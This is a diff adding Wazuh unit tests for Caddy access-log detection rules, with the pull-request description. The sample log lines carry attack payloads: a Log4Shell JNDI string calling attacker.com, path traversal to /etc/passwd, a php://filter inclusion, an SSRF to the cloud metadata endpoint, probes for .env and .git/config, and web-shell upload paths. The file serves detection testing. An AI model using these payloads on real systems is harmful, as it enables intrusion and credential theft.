+[Caddy: HTTP TRACE method - possible cross-site tracing.]
+log 1 pass = {"level":"info","ts":1781976034.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.8","remote_port":"12352","client_ip":"10.0.0.8","proto":"HTTP/1.1","method":"TRACE","host":"localhost:8080","uri":"/","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996011
+alert = 6
+decoder = json
+
+[Caddy: Log4Shell JNDI injection attempt.]
+log 1 pass = {"level":"info","ts":1781976035.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.9","remote_port":"12353","client_ip":"10.0.0.9","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/?x=${jndi:ldap://attacker.com/a}","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996012
+alert = 15
+decoder = json
+
+[Caddy: Sensitive file access attempt.]
+log 1 pass = {"level":"info","ts":1781976036.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.10","remote_port":"12354","client_ip":"10.0.0.10","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/wp-config.php","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996013
+alert = 8
+decoder = json
+
+[Caddy: Credential or private key file access.]
+log 1 pass = {"level":"info","ts":1781976037.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.11","remote_port":"12355","client_ip":"10.0.0.11","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/.env","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996014
+alert = 12
+decoder = json
+
+[Caddy: Backup or database dump file access.]
+log 1 pass = {"level":"info","ts":1781976038.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.12","remote_port":"12356","client_ip":"10.0.0.12","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/database.sql","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996015
+alert = 10
+decoder = json
+
+[Caddy: Source control artifact access.]
+log 1 pass = {"level":"info","ts":1781976039.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.13","remote_port":"12357","client_ip":"10.0.0.13","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/.git/config","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996016
+alert = 10
+decoder = json
+
+[Caddy: Application log file access.]
+log 1 pass = {"level":"info","ts":1781976040.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.14","remote_port":"12358","client_ip":"10.0.0.14","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/error.log","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996017
+alert = 8
+decoder = json
+
+[Caddy: Request for suspicious filename.]
+log 1 pass = {"level":"info","ts":1781976041.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.15","remote_port":"12359","client_ip":"10.0.0.15","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/passwords.txt","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996020
+alert = 8
+decoder = json
+
+[Caddy: Authentication endpoint access.]
+log 1 pass = {"level":"info","ts":1781976042.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.0.0.16","remote_port":"12360","client_ip":"10.0.0.16","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/login","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":401,"resp_headers":{"Server":["Caddy"]}}
+rule = 996021
+alert = 3
+decoder = json
+
+# Can't yet test frequency   <rule id="996022" level="10" frequency="10" timeframe="60">
+;[Caddy: Possible brute force - repeated auth endpoint hits.]
+;
+;rule = 996022
+;alert = 10
+;decoder = json
+
+[Caddy: Encoding evasion / WAF bypass attempt.]
+log 1 pass = {"level":"info","ts":1781976043.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.1","remote_port":"12361","client_ip":"10.1.0.1","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/..%c0%ae/etc/passwd","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996023
+alert = 10
+decoder = json
+
+[Caddy: LFI/RFI file inclusion attempt.]
+log 1 pass = {"level":"info","ts":1781976044.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.2","remote_port":"12362","client_ip":"10.1.0.2","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/page?file=php://filter/convert.base64-encode/resource=index.php","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996024
+alert = 12
+decoder = json
+
+[Caddy: SSRF attempt targeting internal resource.]
+log 1 pass = {"level":"info","ts":1781976045.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.3","remote_port":"12363","client_ip":"10.1.0.3","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/fetch?url=http://169.254.169.254/latest/meta-data/","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996025
+alert = 12
+decoder = json
+
+[Caddy: GraphQL introspection or API schema probe.]
+log 1 pass = {"level":"info","ts":1781976046.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.4","remote_port":"12364","client_ip":"10.1.0.4","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/graphql?query=__schema{types{name}}","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996026
+alert = 8
+decoder = json
+
+[Caddy: Unusual or dangerous HTTP method.]
+log 1 pass = {"level":"info","ts":1781976047.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.5","remote_port":"12365","client_ip":"10.1.0.5","proto":"HTTP/1.1","method":"DEBUG","host":"localhost:8080","uri":"/","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996027
+alert = 8
+decoder = json
+
+[Caddy: Suspicious User-Agent - empty or oversized.]
+log 1 pass = {"level":"info","ts":1781976047.5,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.5","remote_port":"12366","client_ip":"10.1.0.5","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/","headers":{"User-Agent":[],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996028
+alert = 6
+decoder = json
+
+[Caddy: Dangerous file upload attempt.]
+log 1 pass = {"level":"info","ts":1781976048.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.6","remote_port":"12367","client_ip":"10.1.0.6","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/uploads/shell.php","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996029
+alert = 12
+decoder = json
+
+[Caddy: Oversized URI - possible fuzzing.]
+log 1 pass = {"level":"info","ts":1781976049.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.1.0.7","remote_port":"12368","client_ip":"10.1.0.7","proto":"HTTP/1.1","method":"GET","host":"localhost:8080","uri":"/search?q=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996030
+alert = 8
+decoder = json
+
+[Caddy: Double extension bypass upload attempt.]
+log 1 pass = {"level":"info","ts":1781976050.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.2.0.1","remote_port":"12369","client_ip":"10.2.0.1","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/uploads/shell.php.jpg","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996031
+alert = 13
+decoder = json
+
+[Caddy: Archive or macro-enabled file upload.]
+log 1 pass = {"level":"info","ts":1781976051.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.2.0.2","remote_port":"12370","client_ip":"10.2.0.2","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/uploads/malware.docm","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"]}}
+rule = 996032
+alert = 8
+decoder = json
+
+# Can't yet test frequency   <rule id="996018" level="14" frequency="10" timeframe="60">
+;[Caddy: Directory enumeration - repeated sensitive path probes.]
+;
+;rule = 996018
+;alert = 14
+;decoder = json
+
+# Can't yet test frequency   <rule id="996019" level="14" frequency="8" timeframe="60">
+;[Caddy: Aggressive scanning - repeated path traversal attempts.]
+;
+;rule = 996019
+;alert = 14
+;decoder = json


### PR DESCRIPTION
## Description

Caddy is a modern open-source web server with automatic HTTPS. It is not currently covered by the Wazuh ruleset. This PR adds a decoder and detection rules for its JSON access log format.

## Proposed Changes

- Added `ruleset/decoders/0590-caddy_decoders.xml`, a parent/child decoder pair using JSON_Decoder to parse Caddy structured access logs
- Added `ruleset/rules/0965-caddy_rules.xml` with 29 detection rules (IDs 996000-996032) covering SQLi, XSS, command injection, path traversal, Log4Shell, LFI/RFI, SSRF, scanner User-Agents, GraphQL introspection, upload abuse (web shell, double extension, archive/macro), dangerous HTTP methods, encoding evasion, oversized URIs, and brute force correlation. All rules are PCRE2-based and MITRE ATT&CK mapped.
- Added `ruleset/testing/tests/caddy.ini`. It has 26 unit test cases covering all testable rules (3 frequency-based rules are commented out per convention)

### Results and Evidence

All 26 tests passed with runtests.py on Wazuh v4.14.5:

```
|          File           |  Passed  |  Failed  |  Status  |
|        --------         | -------- | -------- | -------- |
|./tests/caddy.ini        |    26    |    0     |    ✅    |
```

Sample wazuh-logtest output confirming rule firing:

```
id: '996012' | level: '15' | description: 'Caddy: Log4Shell JNDI injection attempt from 10.0.0.9'
id: '996025' | level: '12' | description: 'Caddy: SSRF attempt targeting internal resource from 10.1.0.3'
id: '996031' | level: '13' | description: 'Caddy: Double extension bypass upload attempt from 10.2.0.1'
```
and in detail:
```
**Phase 1: Completed pre-decoding.
        full event: '{"level":"info","ts":1781980011.0,"logger":"http.log.access.log0","msg":"handled request","request":{"remote_ip":"10.2.0.2","remote_port":"60011","client_ip":"10.2.0.2","proto":"HTTP/1.1","method":"POST","host":"localhost:8080","uri":"/uploads/malware.docm","headers":{"User-Agent":["Mozilla/5.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.0001,"size":16,"status":200,"resp_headers":{"Server":["Caddy"],"Content-Type":["text/plain; charset=utf-8"]}}'

**Phase 2: Completed decoding.
        name: 'json'
        bytes_read: '0'
        duration: '0.000100'
        level: 'info'
        logger: 'http.log.access.log0'
        msg: 'handled request'
        request.client_ip: '10.2.0.2'
        request.headers.Accept: '['*/*']'
        request.headers.User-Agent: '['Mozilla/5.0']'
        request.host: 'localhost:8080'
        request.method: 'POST'
        request.proto: 'HTTP/1.1'
        request.remote_ip: '10.2.0.2'
        request.remote_port: '60011'
        request.uri: '/uploads/malware.docm'
        resp_headers.Content-Type: '['text/plain; charset=utf-8']'
        resp_headers.Server: '['Caddy']'
        size: '16'
        status: '200'
        ts: '1781980011'

**Phase 3: Completed filtering (rules).
        id: '996032'
        level: '8'
        description: 'Caddy: Archive or macro-enabled file upload from 10.2.0.2 - /uploads/malware.docm'
        groups: '['caddy', 'web', 'web', 'recon', 'upload']'
        firedtimes: '1'
        mail: 'False'
        mitre.id: '['T1566.001']'
        mitre.tactic: '['Initial Access']'
        mitre.technique: '['Spearphishing Attachment']'
**Alert to be generated.
```

### Manual tests with their corresponding evidence

- Compilation without warnings on every supported platform
  - [ ] Linux
  - [ ] Windows
  - [ ] MAC OS X
- [x] Log syntax and correct language review

- Memory tests for Linux: N/A
- Memory tests for Windows: N/A
- Memory tests for macOS: N/A

- Decoder/Rule tests _(Wazuh v4.x)_
  - [x] Added unit testing files ".ini"
  - [x] `runtests.py` executed without errors

- Engine _(Wazuh v5.x and above)_: N/A

- Wazuh server API/Framework: N/A

### Artifacts Affected

- `ruleset/decoders/0590-caddy_decoders.xml`
- `ruleset/rules/0965-caddy_rules.xml`
- `ruleset/testing/tests/caddy.ini`

### Configuration Changes

N/A

### Tests Introduced

26 unit test cases in `ruleset/testing/tests/caddy.ini` validated with runtests.py against a Wazuh v4.14.5 installation. Each test covers one rule with a real Caddy JSON access log line. Frequency-based rules (996018, 996019, 996022) are commented out per the existing convention in other .ini files.

## Review Checklist

- [ ] Code changes reviewed
- [x] Relevant evidence provided
- [x] Tests cover the new functionality
- [x] Configuration changes documented — N/A
- [x] Developer documentation reflects the changes — N/A
- [x] Meets requirements and/or definition of done
- [x] No unresolved dependencies with other issues